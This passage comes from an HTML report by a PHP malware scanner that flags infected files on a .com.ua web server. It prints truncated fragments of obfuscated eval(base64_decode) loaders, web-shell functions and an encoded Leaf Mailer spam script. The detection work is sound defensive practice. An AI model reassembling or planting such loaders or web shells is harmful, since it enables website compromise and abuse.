<span style="color: #0000BB">iYXNlNj</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 0f37c730 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 0f37c730)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">mdW5jdGlvb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">nemluZmxhdG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 80e70adc <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 80e70adc)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700"><?</span><span style="color: #0000BB">php<br /></span><span style="color: #007700">eval</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 91535293 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 91535293)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ldmFs</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ZXZhb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">V2YW</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_134").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/zjtte.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 52.73 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 18:56:45</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 18:56:45</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 14</span><br><table id="file_135" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'4tNCPdUMNHGp37TLg3k6pPY5CIf6KWFdMqFEChJKXgZbi1BELpXmoM6ztMvoPnWg4eQUvTkc3PmAcwmls4bLBEQTSX1ckJGas66NtmwXAaljK4uUMePcJnGVpTYHwRtF3uTXMQDYJ2O8umyGtGsMsdkHxFjTSqmY1beQbJ7x0Ls9WyJ6ASK9QrEzGTf7IdPIPre8mqhI9eodyFMNj9YGRJDn4CcfJ2kg2eIoDbWPphXTbRPGymWPdoz2ZTpl06XQOtLLx7gsxvK3Irk9BTH1PqIsFBobKuAAvoc0SoCKu93DeTNctdZDxvZmgGsswABEIsOaUOsA2MUKfu9SxAH8JNoIXBOCmP6yV9cgTI617pcLxXozLLp4CBgY6DKMgckypa8MEWDrpi0uDksDJcp9nY1MVP05l9w4HNHAr3s0crA8C0jhvHHHTYlLPxeNcFoVSCkMXiWORKVrbYrMaYRShWQq0pJFhNkC7vDJ1G0TBv51pj82gTS...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strrev</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">$_xwynUOL</span><span style="color: #007700">(</span><span style="color: #0000BB">_6Zys</span><span style="color: #007700">(</span><span style="color: #0000BB">$_cCzFdr</span><span style="color: #007700">))));}eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(</span><span style="color: #0000BB">_r5Me0FNrh83UY9xZt</span><span style="color: #007700">(</span><span style="color: #DD0000">'4tNCPdUMNHGp37TLg3k6pPY5CIf6KWFdMqFEChJKXgZbi1BELpXmoM6ztMvoPnWg4eQUvTkc3PmAcwmls4bLBEQTSX1ckJGas66NtmwXAaljK4uUMePcJnGVpTYHwR</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2P</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function str_rot13 exec_str_rot13 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RkRP</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 085a0329 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 085a0329)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">iYXNlNj</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 0f37c730 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 0f37c730)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">mdW5jdGlvb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">nemluZmxhdG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 80e70adc <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 80e70adc)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700"><?</span><span style="color: #0000BB">php<br /></span><span style="color: #007700">eval</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 91535293 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 91535293)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ldmFs</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ZXZhb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">V2YW</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_135").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/tjpji.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 26.20 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2025-02-24 03:40:06</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-02-04 16:45:58</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_136" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ingfo</span><span style="color: #007700">; } </span><span style="color: #0000BB">?></span> </div> </body> </html></span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">statusnya</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1561</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ingfo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 751</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #DD0000">");</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 765</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">author</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 785</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cekdir</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 799</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span class='writable'>writable</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 803</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<span class='readonly'>readonly</span>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 811</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cekroot</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">xrmdir</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 859</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">green</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 867</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">red</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 891</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">php_uname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_136").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/ynrab.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 216.49 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 18:55:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 18:55:03</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 21</span><br><table id="file_137" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICAgfQogICAgZWxzZSB7CiA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 085a0329 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 085a0329)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">iYXNlNj</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 0f37c730 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 0f37c730)</p></td><td><code><code><span style="color: #000000">
